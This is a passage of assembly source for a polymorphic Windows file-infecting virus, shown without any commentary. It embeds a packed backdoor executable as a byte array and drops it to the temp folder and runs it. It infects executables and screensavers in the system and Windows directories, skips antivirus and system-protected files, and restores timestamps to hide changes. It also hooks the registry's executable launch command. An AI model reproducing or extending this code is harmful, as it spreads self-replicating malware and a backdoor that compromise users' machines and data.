201,58,204,29,204,194,18,225,22,46,196,231,221,65,115,38 + db 105,8,39,115,93,85,41,108,28,241,85,112,220,58,150,189 + db 100,43,147,62,98,237,114,100,134,77,155,59,217,31,113,112 + db 245,116,102,72,140,170,120,154,58,120,73,29,100,151,13,194 + db 152,65,17,71,20,216,199,178,217,101,64,26,108,65,14,96 + db 45,0,90,24,17,4,146,45,41,145,95,193,163,42,146,13 + db 20,255,216,120,88,134,18,57,116,177,117,140,118,55,18,85 + db 91,67,97,99,43,85,75,96,75,96,65,125,24,104,158,102 + db 27,22,24,232,70,168,109,44,71,17,21,52,127,248,101,219 + db 116,221,16,80,24,176,255,116,2,115,150,101,89,150,1,2 + db 3,4,52,9,90,150,101,89,11,13,16,19,23,249,39,167 + db 40,134,3,0,143,87,26,64,189,150,231,50,15,1,62,136 + db 
18,102,144,82,20,134,80,201,144,71,200,64,0,224,1,228 + db 7,169,2,222,232,81,0,0,180,162,104,23,32,167,232,1 + db 147,131,164,144,134,214,60,162,40,128,148,62,81,52,216,147 + db 94,224,11,251,12,7,36,33,75,94,66,224,123,79,73,211 + db 117,116,96,39,14,78,192,0,208,0,0,95,110,31,132,84 + db 213,214,1,0,4,0,0,0,0,0,0,128,255,0,0,0 + db 96,190,0,208,65,0,141,190,0,64,254,255,87,131,205,255 + db 235,16,144,144,144,144,144,144,138,6,70,136,7,71,1,219 + db 117,7,139,30,131,238,252,17,219,114,237,184,1,0,0,0 + db 1,219,117,7,139,30,131,238,252,17,219,17,192,1,219,115 + db 239,117,9,139,30,131,238,252,17,219,115,228,49,201,131,232 + db 3,114,13,193,224,8,138,6,70,131,240,255,116,116,137,197 + db 1,219,117,7,139,30,131,238,252,17,219,17,201,1,219,117 + db 7,139,30,131,238,252,17,219,17,201,117,32,65,1,219,117 + db 7,139,30,131,238,252,17,219,17,201,1,219,115,239,117,9 + db 139,30,131,238,252,17,219,115,228,131,193,2,129,253,0,243 + db 255,255,131,209,1,141,20,47,131,253,252,118,15,138,2,66 + db 136,7,71,73,117,247,233,99,255,255,255,144,139,2,131,194 + db 4,137,7,131,199,4,131,233,4,119,241,1,207,233,76,255 + db 255,255,94,137,247,185,232,1,0,0,138,7,71,44,232,60 + db 1,119,247,128,63,1,117,242,139,7,138,95,4,102,193,232 + db 8,193,192,16,134,196,41,248,128,235,232,1,240,137,7,131 + db 199,5,137,216,226,217,141,190,0,208,1,0,139,7,9,192 + db 116,69,139,95,4,141,132,48,0,240,1,0,1,243,80,131 + db 199,8,255,150,180,240,1,0,149,138,7,71,8,192,116,220 + db 137,249,121,7,15,183,7,71,80,71,185,87,72,242,174,85 + db 255,150,184,240,1,0,9,192,116,7,137,3,131,195,4,235 + db 216,255,150,188,240,1,0,97,233,115,28,254,255,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,252,0,2,0 + db 180,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 
9,1,2,0,196,0,2,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,22,1,2,0,204,0,2,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,35,1,2,0,212,0,2,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,47,1,2,0 + db 220,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 58,1,2,0,228,0,2,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,70,1,2,0,236,0,2,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,80,1,2,0,244,0,2,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,92,1,2,0,106,1,2,0,122,1,2,0 + db 0,0,0,0,136,1,2,0,0,0,0,0,150,1,2,0 + db 0,0,0,0,172,1,2,0,0,0,0,0,188,1,2,0 + db 0,0,0,0,198,1,2,0,0,0,0,0,212,1,2,0 + db 0,0,0,0,23,0,0,128,0,0,0,0,75,69,82,78 + db 69,76,51,50,46,68,76,76,0,65,68,86,65,80,73,51 + db 50,46,100,108,108,0,82,65,83,65,80,73,51,50,46,100 + db 108,108,0,83,72,69,76,76,51,50,46,100,108,108,0,85 + db 83,69,82,51,50,46,100,108,108,0,87,73,78,73,78,69 + db 84,46,100,108,108,0,87,73,78,77,77,46,100,108,108,0 + db 87,83,79,67,75,51,50,46,100,108,108,0,0,0,76,111 + db 97,100,76,105,98,114,97,114,121,65,0,0,71,101,116,80 + db 114,111,99,65,100,100,114,101,115,115,0,0,69,120,105,116 + db 80,114,111,99,101,115,115,0,0,0,82,101,103,67,108,111 + db 115,101,75,101,121,0,0,0,82,97,115,69,110,117,109,67 + db 111,110,110,101,99,116,105,111,110,115,65,0,0,0,83,104 + db 101,108,108,69,120,101,99,117,116,101,65,0,0,0,84,111 + db 65,115,99,105,105,0,0,0,70,116,112,80,117,116,70,105 + db 108,101,65,0,0,0,109,99,105,83,101,110,100,83,116,114 + db 105,110,103,65,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + + + + +BackdoorEnd dd 0 + +Backdoor db "DABACKDOOR.EXE",0 + + Drop_BackDoor proc + + sub esp, 280 + mov ebx, esp + + push ebx + push 255 + lea eax, dword ptr [ebp + szGetTempPathA] + Call K32Api + sub esp, 280 + + mov esi, ebx + mov edi, esp + @@: + lodsb + stosb + test al, al + jnz @B + dec edi + + .IF byte ptr [edi-1] != '\' + mov byte ptr [edi], '\' + inc edi + .ENDIF + lea esi, dword ptr [ebp + Backdoor] + + @@: + lodsb + stosb + test al, al + jnz @B + + + + mov esi, esp + mov edi, ebx + + push 0 + push FILE_ATTRIBUTE_NORMAL + push CREATE_ALWAYS 
+ push 0 + push 0 + push GENERIC_WRITE + push esi + lea eax,[ebp+szCreateFileA] + Call K32Api + + .IF eax != INVALID_HANDLE_VALUE ; Error : file already exist + + mov ebx, eax + + push 0 + lea eax, dword ptr [ebp + BackdoorEnd] ; <- Written + push eax + push (OFFSET BackdoorEnd - OFFSET BackdoorStart) + lea eax, dword ptr [ebp + BackdoorStart] + push eax + push ebx + lea eax, dword ptr [ebp + szWriteFile] + Call K32Api + + lea eax,dword ptr [ebp + InfectionTime] + push eax + push eax + push eax + push ebx + lea eax, dword ptr [ebp + szSetFileTime] + Call K32Api + + + push ebx + lea eax,[ebp+szCloseHandle] + Call K32Api + + .ENDIF + + sub esp, SIZEOF STARTUPINFO + 40 + mov ebx, esp + push ebx + lea eax, dword ptr [ebp + szGetStartupInfoA] + Call K32Api + + sub esp, SIZEOF PROCESS_INFORMATION + 40 + mov edx, esp + + push edx + + xor eax,eax + push edx + push ebx + push edi + push eax + push NORMAL_PRIORITY_CLASS + push eax + push eax + push eax + push eax + push esi + lea eax, dword ptr [ebp + szCreateProcessA] + Call K32Api + + pop ebx + + + push [ebx+4] + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + + add esp, (280 * 2 + SIZEOF PROCESS_INFORMATION + 40 + SIZEOF STARTUPINFO + 40) + + ret + Drop_BackDoor endp + + GetK32 proc + + + + + lea eax,[ErrKernl+ebp] + push eax + + + mov dword ptr [ebp + @StackPtr], esp + + xor edx,edx + push dword ptr fs:[edx] + mov dword ptr fs:[edx],esp + + + push 5 ; Scan 5 Pages + pop ecx + + _@1: cmp word ptr [esi],"ZM" + jz WeGotK32 + _@2: sub esi,10000h + dec ecx + jnz _@1 + WeFailed: + + + + xor esi,esi + WeGotK32: + xchg eax,esi + jmp K32Ok + ErrKernl: + xor eax, eax + K32Ok: + DB 0BCh + @StackPtr dd 00000000h + xor edx,edx + pop dword ptr fs:[edx] + + + db 0BDh + @@@Delta dd 00000000h + + ret + + + + GetK32 endp + + + + + GetGetProcAddressAddress proc + and dword ptr [ebp + ApiCounter],0 + mov edi,dword ptr [eax+3Ch] ;PE hdr + add edi,eax + assume edi:ptr IMAGE_NT_HEADERS + mov 
edi,[edi].OptionalHeader.DataDirectory.VirtualAddress + add edi,eax + assume edi:ptr IMAGE_EXPORT_DIRECTORY + mov ecx,[edi].NumberOfNames + mov esi,[edi].AddressOfNames + + + add esi,eax + xchg eax,ebx + MatchLp: + + lodsd + add eax,ebx + + push ecx + push edi + push esi + + push GPASIZE + pop ecx + lea edi,[ebp+szGetProcAddress] + mov esi,eax + repz cmpsb + + pop esi + pop edi + + or ecx,ecx + jz GPA_found + + inc dword ptr [ebp + ApiCounter] + + pop ecx + dec ecx + jnz MatchLp + + mov dword ptr [ebp + _GetProcAddress], 0bff76dach ; Not found. hardcode it ( Win95/98 ) + ret + + GPA_found: + + mov esi,[edi].AddressOfNameOrdinals + pop ecx + + + mov ecx,dword ptr [ebp + ApiCounter] + shl ecx,1 + add esi,ecx + add esi,ebx + xor eax,eax + lodsw + shl eax,2 + + add eax,[edi].AddressOfFunctions + mov esi,eax + add esi,ebx + lodsd + add eax,ebx + + assume edi :nothing + mov dword ptr [ebp + _GetProcAddress],eax + + ret + GetGetProcAddressAddress endp + + infect_newsystem proc + + + + lea ebx, dword ptr [ebp + szGetSystemDirectoryA] + xor ecx, ecx + inc ecx + @@: + push ecx + sub esp, 300 + mov esi, esp + push 0FFh ; Dir size + push esi ; buffer + mov eax, ebx + Call K32Api + mov eax, esi + call _strlen + mov ecx, esi + add ecx, eax + mov dword ptr [ecx], '*.*\' + mov byte ptr [ecx + 4], 0 + + mov eax, esi + Call InfectDir + add esp, 300 + lea ebx, dword ptr [ebp + szGetWindowsDirectoryA] + pop ecx + dec ecx + jns @B + ret + infect_newsystem endp + + InfectDir Proc + + + + + + sub esp, (SIZEOF (WIN32_FIND_DATA) + 400) + + mov ebx, esp + push ebx + push eax ; DirPath + lea eax, dword ptr [ebp+szFindFirstFileA] + CAll K32Api + inc eax + jz SHIT ; Fucking ERR_NOACCESS under XP! 
+ dec eax + mov dword ptr [ebp + hFind], eax + + mov edi, esp + add edi, (SIZEOF (WIN32_FIND_DATA) + 4) + push edi + @@: + lodsb + cmp al, '*' + jz @F + stosb + jmp @B + @@: + xor al, al + stosb + pop esi + + + and byte ptr [ebp+InfectionCtr],0 + + FindLp: + assume ebx:ptr WIN32_FIND_DATA + + lea eax, dword ptr [[ebx].cFileName] + + push eax + mov edi,eax + xor ecx,ecx + dec ecx + xor al,al ; last byte 0 + repnz scasb + pop eax + or dword ptr [edi-5],20202020h + .IF dword ptr [edi-5] != 'exe.' && dword ptr [edi-5] != 'rcs.' + + jnz skipfile + + .ENDIF + + + + mov ecx,dword ptr [[ebx].nFileSizeHigh] ; skip large file + test ecx,ecx + jnz skipfile + + + + + push esi + push eax + mov eax, esi + call _strlen + mov ecx, esi + add ecx, eax + mov edx, ecx + mov edi, ecx + pop esi + + @@: + lodsb + stosb + or al,al + jnz @b + pop esi + + ;push edx + ;xor ecx, ecx + ;push ecx + ;push esi + ;push esi + ;push ecx + ;lea eax, dword ptr [ebp + szMessageBoxA] + ;Call U32Api + ;pop edx + + mov eax, esi + pushad + Call IsFileAV? + dec eax + popad + jz @F ; IS it an AV file ? + Call infect ; All criterias Ok? infect !!! 
+ @@: + ;;---- + ;inc byte ptr [ebp + InfectionCtr] + + ;--- + and byte ptr [edx], 0 + skipfile: + + + push ebx + push dword ptr [ebp + hFind] + lea eax, dword ptr [ebp + szFindNextFileA] + CAll K32Api + cmp byte ptr [ebp + InfectionCtr], 7 ; infect 7 files in dir + jae ExitFind + + test eax,eax + jnz FindLp + + ExitFind: + push dword ptr [ebp+hFind] + lea eax,[ebp+szFindClose] ; Close Search handle + CAll K32Api + SHIT: + add esp, (SIZEOF (WIN32_FIND_DATA) + 400) + ret + InfectDir endp + + + + infect proc + + pushad + + + + mov dword ptr [ebp + pFileName],eax + + + xor esi,esi + and byte ptr [ebp + _SizeTestFailed], 0 ; Init Ok + + sub esp, 1100 + mov ebx, esp + + cmp dword ptr [ebp + hSFC], 0 ; Not W2k/Xp + jz Infect2nd + + + + push 1024 + push ebx + push -1 + push eax + push esi + push esi + lea eax, dword ptr [ebp + szMultiByteToWideChar] + Call K32Api + + lea eax, dword ptr [ebp + szSfcIsFileProtected] + push eax + push dword ptr [ebp + hSFC] + Call dword ptr [ebp + _GetProcAddress] + + or eax, eax ; Api not found ? + jz Infect2nd + + cmp byte ptr [eax], 0CCh + jz ZeroShit + + + push ebx ; + push esi ; 0 + Call eax ; Call SfcIsFileProtected + + or eax, eax + jz Infect2nd + add esp, 1100 + popad + ret ; It's Protected ! 
+ + Infect2nd: + add esp, 1100 + + and dword ptr [ebp + Patched?],0 ; init error + + xor esi,esi + + push esi + push esi + push esi + push esi + lea eax, dword ptr [ebp + szCreateEventA] + Call K32Api + mov dword ptr [ebp + InfEvent], eax + + mov dword ptr [ebp + ThreadDelta], ebp + + lea eax, dword ptr [ebp + CheckInfectionTimeOutThreadID] + push eax + push esi + push esi + lea eax, dword ptr [ebp + CheckInfectionTimeOutThread] + push eax + push esi + push esi + lea eax, dword ptr [ebp + szCreateThread] + Call K32Api + + push eax + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + + + + push dword ptr [ebp + pFileName] + lea eax, dword ptr [ebp + szGetFileAttributesA] ; Save Original attribs + Call K32Api + mov dword ptr [ebp + OriginalAttributes],eax + + + push FILE_ATTRIBUTE_NORMAL ; Reset attributes + push dword ptr [ebp + pFileName] + lea eax, dword ptr [ebp + szSetFileAttributesA] + + Call K32Api + + + + push esi + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push esi + push FILE_SHARE_READ or FILE_SHARE_WRITE + push GENERIC_READ or GENERIC_WRITE + push dword ptr [ebp + pFileName] + lea eax,[ebp+szCreateFileA] + Call K32Api + + inc eax + jz ErrOpen + dec eax + mov dword ptr [ebp+hFile],eax + + + lea eax,dword ptr [ebp + LastWriteTime] + push eax + lea eax,dword ptr [ebp + LastAccessTime] + push eax + lea eax,dword ptr [ebp + CreationTime] + push eax + push dword ptr [ebp+hFile] + lea eax, dword ptr [ebp + szGetFileTime] + Call K32Api + + + push esi + push esi + push esi + push PAGE_READWRITE + push esi + push dword ptr [ebp+hFile] + lea eax,[ebp+szCreateFileMappingA] + call K32Api + + + + or eax,eax + jz ErrMap1 + + mov dword ptr [ebp +hMap],eax + + push esi + push esi + push esi + push FILE_MAP_ALL_ACCESS + push dword ptr [ebp+hMap] + lea eax,[ebp+szMapViewOfFile] + call K32Api + + test eax,eax + jz ErrMap2 + + mov dword ptr [ebp +pMap],eax + + cmp word ptr [eax],IMAGE_DOS_SIGNATURE + jnz ErrInf + + + mov dword ptr [ebp + _Inf_ESP], esp + mov 
dword ptr [ebp + _Inf_EBP], ebp + ;mov dword ptr [ebp + _Inf_ESP2], esp + ;mov dword ptr [ebp + _Inf_EBP2], ebp + ;mov dword ptr [ebp + _Inf_ESP3], esp + ;mov dword ptr [ebp + _Inf_EBP3], ebp + + + + lea ecx,[ebp + inf_main_handler] + push ecx + + xor edx,edx + push dword ptr fs:[edx] + mov dword ptr fs:[edx],esp + + + + mov edi,[eax+3ch] + add edi,eax + cmp dword ptr [edi],IMAGE_NT_SIGNATURE + jnz ErrInf + + + + + assume edi: ptr IMAGE_NT_HEADERS + mov ecx,[edi].OptionalHeader.FileAlignment + mov dword ptr [ebp + FAlignment], ecx + + + movzx esi, word ptr [edi].FileHeader.SizeOfOptionalHeader + lea esi, [[edi].OptionalHeader + esi] ; esi pointe sur le premier IMAGE_SECTION_HEADER + + + movzx eax, word ptr [[edi].FileHeader.NumberOfSections] + dec eax + imul eax,eax,sizeof IMAGE_SECTION_HEADER + + add esi,eax ; esi pointe sur le dernier IMAGE_SECTION_HEADER + + + xor eax,eax + push eax + push dword ptr [ebp + hFile] + lea eax, dword ptr [ebp+szGetFileSize] + call K32Api + mov dword ptr [ebp + OldSize],eax + + cmp eax,MINIMUM_FILE_SIZE ; Avoid Small Files + jb ErrInf + + cmp eax,MAXIMUM_FILE_SIZE ; Avoid Big Files + ja ErrInf + + assume esi:ptr IMAGE_SECTION_HEADER + mov ecx,eax + mov edx,[esi].PointerToRawData + + ;.IF byte ptr [ebp + _SizeTestFailed] != 0 + ; push eax + + ;.ELSE + .IF dword ptr [esi].Misc.VirtualSize != 0 ; + push dword ptr [esi].Misc.VirtualSize + .ELSE + ;xor eax, eax + ;mov [eax], eax + push dword ptr [esi].SizeOfRawData; + .ENDIF + ;.ENDIF + + pop dword ptr [ebp + SizeRelative] + add edx, dword ptr [ebp + SizeRelative] + sub ecx,edx + sub eax,ecx + + + + mov dword ptr [ebp + Size2Align],eax ; offset where to start virus + + + + mov ecx,ZipSignLen + lea edi,[ebp + ZipSign] + repz cmpsb + + + test ecx,ecx + jz ErrInf ; test for winzip self extractor + + + Call UnMap + + + + + + + + + mov eax,dword ptr [ebp + Size2Align] + mov ecx,dword ptr [ebp + FAlignment] + add eax,MAX_POLY_SIZE + + + call _Align + xchg ecx,eax ;New File Size = Old File Size 
+ VirusSize + + + .IF ecx < dword ptr [ebp + OldSize] ; would it cut file ? + ;inc byte ptr [ebp + _SizeTestFailed] ; security + + + xor edx,edx + pop dword ptr fs:[edx] + add esp, 4 + ;db 0BCh + ;_Inf_ESP2 dd 0 + ;db 0BDh + ;_Inf_EBP2 dd 0 + + + jmp CloseSetDateAttrib + .ENDIF + Call trunc_file + + + push esi ; esi == 0 + push ecx + push esi + push PAGE_READWRITE + push esi + push dword ptr [ebp+hFile] + lea eax,[ebp+szCreateFileMappingA] + call K32Api + + test eax,eax + jz ErrMap1 + mov dword ptr [ebp +hMap],eax + + + + push esi + push esi + push esi + push FILE_MAP_ALL_ACCESS + push dword ptr [ebp+hMap] + lea eax,[ebp+szMapViewOfFile] + call K32Api + test eax,eax + jz ErrMap2 + + mov dword ptr [ebp +pMap],eax + + mov edi,[eax+3ch] + add edi,eax + + + mov dword ptr [ebp + PEheader],edi + push dword ptr [edi].OptionalHeader.ImageBase + pop dword ptr [ebp + ImageBase] + ;mov eax, dword ptr [edi].OptionalHeader.SectionAlignment + ;mov dword ptr [ebp + SectionAlignment], eax + + movzx esi, word ptr [edi].FileHeader.SizeOfOptionalHeader + lea esi, [[edi].OptionalHeader + esi] ; esi pointe sur le premier IMAGE_SECTION_HEADER + + + + movzx eax, word ptr [[edi].FileHeader.NumberOfSections] + dec eax + imul eax,eax,sizeof IMAGE_SECTION_HEADER + + add esi,eax ; esi pointe sur le dernier IMAGE_SECTION_HEADER + + assume esi:ptr IMAGE_SECTION_HEADER + + + lea ebx,[ebp + szExitProcess] + lea edx,[ebp + Kernel] + Call CheckFunctionImported + mov dword ptr [ebp + _Exit1],eax + lea ebx,[ebp + exit] + xor edx,edx + Call CheckFunctionImported + mov dword ptr [ebp + _Exit2],eax + xor edx,edx + lea ebx,[ebp + _exit] + Call CheckFunctionImported + mov dword ptr [ebp + _Exit3],eax + + cmp dword ptr [ebp + _Exit1],0 + jnz PatchPlz + cmp dword ptr [ebp + _Exit2],0 + jnz PatchPlz + cmp dword ptr [ebp + _Exit3],0 + jnz PatchPlz + + jmp CannotPatch + + PatchPlz: + Call PatchExitFunc + or eax,eax + jnz PatchOk + + CannotPatch: + Call UnMap ; No Know Exit function, Resize File & quit... 
+ + mov ecx,dword ptr [ebp + OldSize] + Call trunc_file + + xor edx,edx + pop dword ptr fs:[edx] + add esp, 4 + + ;db 0BCh + ;_Inf_ESP3 dd 0 + ;db 0BDh + ;_Inf_EBP3 dd 0 + jmp CloseSetDateAttrib + + PatchOk: + + ;---- + Call InitMemAccess ; Get data section offset + + ;---- + or [esi].Characteristics, 00000020h or 20000000h or 80000000h + mov eax, [[esi].PointerToRawData] + or eax,eax + jz ErrInf + + inc byte ptr [ebp+InfectionCtr] + + add eax,dword ptr [ebp + pMap] ;eax pointe sur le début de la derniere section + add eax,dword ptr [ebp + SizeRelative] ;eax pointe sur la fin de la derniere section + + mov edi, eax + + push esi + + mov dword ptr [ebp + FileOFFSET],edi + + push PAGE_EXECUTE_READWRITE + push MEM_RESERVE or MEM_COMMIT + push MAX_POLY_SIZE + push 0 + lea eax, dword ptr [ebp + szVirtualAlloc] + Call K32Api + + mov dword ptr [ebp + pAlloc],eax + + @@: + mov edi, dword ptr [ebp + pAlloc] + + + mov ecx, CryptSize ; Size of the virus to encrypt + lea esi, [ebp+VirusStart] + xor edx,edx + push ebx + Call PolyMain + pop ebx + + cmp dword ptr [ebp + PolyErrFlag], 1 + jz @B ; repair if a non-fatal error occured during polymorphism generation + cmp byte ptr [ebp + PolyMainErr], 0 ; rebuild all code if a fatal error occured + jnz @B + + + + + mov edi, dword ptr [ebp + FileOFFSET] + push ecx + shr ecx, 2 + inc ecx + + rep movsd ; Copy polymorphic virus to file + + + Call UnMap + pop ecx + mov eax, dword ptr [ebp + OldSize] + mov dword ptr [ebp + OldSize], ecx + add eax, ecx + add eax, 1000;-------------------------------------------------- + + + mov ecx,dword ptr [ebp + FAlignment] + call _Align + mov ecx,eax + + Call trunc_file + + xor esi, esi + push esi ; esi == 0 + push ecx + push esi + push PAGE_READWRITE + push esi + push dword ptr [ebp+hFile] + lea eax,[ebp+szCreateFileMappingA] + call K32Api + + test eax,eax + jz ErrMap1 + mov dword ptr [ebp +hMap],eax + + + + push esi + push esi + push esi + push FILE_MAP_ALL_ACCESS + push dword ptr [ebp+hMap] + lea 
eax,[ebp+szMapViewOfFile] + call K32Api + test eax,eax + jz ErrMap2 + + mov dword ptr [ebp +pMap],eax + + mov edi,[eax+3ch] + add edi,eax + mov dword ptr [ebp + PEheader],edi + movzx esi, word ptr [edi].FileHeader.SizeOfOptionalHeader + lea esi, [[edi].OptionalHeader + esi] ; esi pointe sur le premier IMAGE_SECTION_HEADER + movzx eax, word ptr [[edi].FileHeader.NumberOfSections] + dec eax + imul eax,eax,sizeof IMAGE_SECTION_HEADER + add esi,eax ; esi pointe sur le dernier IMAGE_SECTION_HEADER + pop eax + + mov ecx, dword ptr [ebp + SizeRelative] + add ecx, dword ptr [ebp + OldSize] + mov [esi].SizeOfRawData,ecx + mov [esi].Misc.VirtualSize,ecx + mov edi, dword ptr [ebp + PEheader] + mov eax,[esi].SizeOfRawData + add eax,[esi].VirtualAddress + mov [edi].OptionalHeader.SizeOfImage,eax + + ;--- + push MEM_DECOMMIT or MEM_RELEASE + push MAX_POLY_SIZE + push dword ptr [ebp + pAlloc] + lea eax, dword ptr [ebp + szVirtualFree] + Call K32Api + + + ;mov edi, dword ptr [ebp + PEheader] + mov ecx, dword ptr [edi].OptionalHeader.CheckSum ; Recalculate Checksum if needed + jecxz AfterCopy ; Skip Checksum + + lea eax, dword ptr [ebp + IMAGEHLP] + push eax + lea eax, dword ptr [ebp + szLoadLibraryA] + Call K32Api + or eax, eax + jz AfterCopy + + mov ebx, eax + + lea eax, dword ptr [ebp + szCheckSumMappedFile] + push eax + push ebx + Call dword ptr [ebp + _GetProcAddress] + + or eax, eax + jz FreeIMGHLP + + cmp byte ptr [eax], 0CCh + jz ZeroShit + + push eax + xor eax,eax + push eax + push dword ptr [ebp + hFile] + lea eax, dword ptr [ebp+szGetFileSize] + call K32Api + pop edx + + + lea ecx, dword ptr [edi].OptionalHeader.CheckSum + push ecx ; New Checksum + Call @F + dd ? 
; Old Checksum + @@: + push eax ; FileSize + push dword ptr [ebp + pMap] ; MapAddr + Call edx ; Call CheckSumMappedFile + + FreeIMGHLP: + push ebx + lea eax, dword ptr [ebp + szFreeLibrary] + Call K32Api + + AfterCopy: + + + ErrInf: + + + +inf_main_handler: + + xor edx,edx + pop dword ptr fs:[edx] + + db 0BCh + _Inf_ESP dd 0 + db 0BDh + _Inf_EBP dd 0 + + + and byte ptr [ebp + _SizeTestFailed], 0 ; Clear error + + push dword ptr [ebp+pMap] + lea eax,dword ptr [ebp+szUnmapViewOfFile] + call K32Api + + ErrMap2: + push dword ptr [ebp+hMap] + lea eax, dword ptr [ebp+szCloseHandle] + call K32Api + + CloseSetDateAttrib: + lea eax,dword ptr [ebp + LastWriteTime] + push eax + lea eax,dword ptr [ebp + LastAccessTime] + push eax + lea eax,dword ptr [ebp + CreationTime] + push eax + push dword ptr [ebp+hFile] + lea eax, dword ptr [ebp + szSetFileTime] + Call K32Api + + ErrMap1: + + + push dword ptr [ebp+hFile] + lea eax, dword ptr [ebp+szCloseHandle] + call K32Api + ErrOpen: + + + + push dword ptr [ebp + OriginalAttributes] + push dword ptr [ebp + pFileName] + lea eax, dword ptr [ebp + szSetFileAttributesA] + Call K32Api + + ;assume edi:nothing + ;assume esi:nothing + + push dword ptr [ebp + InfEvent] + lea eax, dword ptr [ebp + szSetEvent] ; We did the job + Call K32Api + + cmp byte ptr [ebp + _SizeTestFailed], 0 + jnz Infect2nd + + + + + + popad + ret + infect endp + + +_MainHostFile db 0 +_MainHostFileName dd 0 + +CheckInfectionTimeOutThread: + + db 0BDh +ThreadDelta dd 00000000h + + + push 3000 ; TimeOut + push dword ptr [ebp + InfEvent] + lea eax, dword ptr [ebp + szWaitForSingleObject] + Call K32Api + + + .IF eax == WAIT_TIMEOUT ; infection hanged + .IF byte ptr [ebp + _MainHostFile] == 1 + + Call ReDoMainHost + + .ELSE + xor eax, eax + dec dword ptr [eax] ; Make fault then clear Mem and quit + .ENDIF + .ENDIF + + push dword ptr [ebp + InfEvent] + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + + push eax + lea eax, dword ptr [ebp + szExitThread] + Call K32Api + 
ret + +ReDoMainHost: + Call UnMap + + push dword ptr [ebp+hFile] + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + + push dword ptr [ebp + _MainHostFileName] + lea eax, dword ptr [ebp + szDeleteFileA] + Call K32Api + Call SetupRegHook + ret + +InfEvent dd 0 +CheckInfectionTimeOutThreadID dd 0 + +NTTargetFile db "taskman.exe",0 +W9xTargetFile db "runonce.exe",0 + +CompNameSize dd MAX_COMPUTERNAME_LENGTH + 1 +LenWinDirStr dd 0 +szKeyName db 'exefile\shell\open\command',0 +szRegHook db ' "%1" %*',0 +Disp dd 0 +pKey dd 0 +WinVer dd 0 + +;REGHOOK +;-------------------------------------------- install reg HOOK Procedures --------------------------- +SetupRegHook proc + + sub esp, 800h ; get some mem + mov eax, esp + push 0FFh ; Dir size + push eax ; buffer + lea eax, dword ptr [ebp + szGetSystemDirectoryA] + Call K32Api + + + mov edi, esp + xor ecx, ecx + ReachNull: + inc ecx + inc edi + cmp byte ptr [edi], 0 ; + jnz ReachNull + + mov dword ptr [ebp + LenWinDirStr], ecx + + mov byte ptr [edi], '\' + inc edi + .IF dword ptr [ebp + WinVer] == VER_PLATFORM_WIN32_NT + lea esi, dword ptr [ebp + NTTargetFile] + .ELSE + lea esi, dword ptr [ebp + W9xTargetFile] + .ENDIF + + @@: + lodsb + stosb + or al,al + jnz @B + + + mov edi, esp ; eax pointer to %systemroot%\target.exe + mov esi, edi + add esi, 0FFh + push esi + push edi + lea eax, dword ptr [ebp + szFindFirstFileA] + Call K32Api + + push eax + push eax + lea eax, dword ptr [ebp + szFindClose] + Call K32Api + pop eax + + inc eax + jnz @F ; not in this dir? + mov edi, esp + push 0FFh ; Dir size + push edi ; buffer + lea eax, dword ptr [ebp + szGetWindowsDirectoryA] + Call K32Api + xor ecx, ecx + jmp ReachNull + @@: + + + + + + + mov ebx, esi + add ebx, SIZEOF WIN32_FIND_DATA + + + + .IF dword ptr [ebp + WinVer] == VER_PLATFORM_WIN32_NT ; infect a copy of rundll on NT because SFC... 
+ + mov dword ptr [ebp + CompNameSize], MAX_COMPUTERNAME_LENGTH + 1 + lea eax, dword ptr [ebp + CompNameSize] + push eax + push ebx + lea eax, dword ptr [ebp + szGetComputerNameA] + Call K32Api + + push ebx + mov eax, ebx + xor ecx, ecx + invert: + mov dl, byte ptr [eax+ecx] + + .IF dl == 0 + jmp CopyNow + .ELSEIF dl >= 41h && dl <= 5Ah + sub dl, 41h + mov bl, 25 + sub bl, dl + mov dl, 41h + add dl, bl + + .ELSEIF dl >= 61h && dl <= 7Ah + sub dl, 61h + mov bl, 25 + sub bl, dl + mov dl, 61h + add dl, bl + + .ENDIF + + mov byte ptr [eax+ecx], dl + inc ecx + jmp invert + + CopyNow: + pop ebx + mov esi, esp + mov edi, ebx + add edi, MAX_COMPUTERNAME_LENGTH + 1 + push edi + mov ecx, dword ptr [ebp + LenWinDirStr] + rep movsb + mov byte ptr [edi], '\' + inc edi + mov esi, ebx + @@: + lodsb + stosb + or al,al + jnz @B + pop edi + mov eax, edi + mov edi, esp + + + push eax + push 1 + push eax + push edi + lea eax, dword ptr [ebp + szCopyFileA] ; Copy the file + Call K32Api ; + pop eax ; WinNt, 2000, XP : infect copy + + .ELSE ; Win9x infect directly rundll32.exe + + + mov eax, esp ; infect original file + + .ENDIF + + push eax ; eax can be either a pointer to the full path of + ; runonce.exe (win9x) or a pointer to a "reversed" computername exe path (NT) + + + + mov dword ptr [ebp + _MainHostFileName], eax + + + mov byte ptr [ebp + _MainHostFile], 1 + Call infect ; infect it ! 
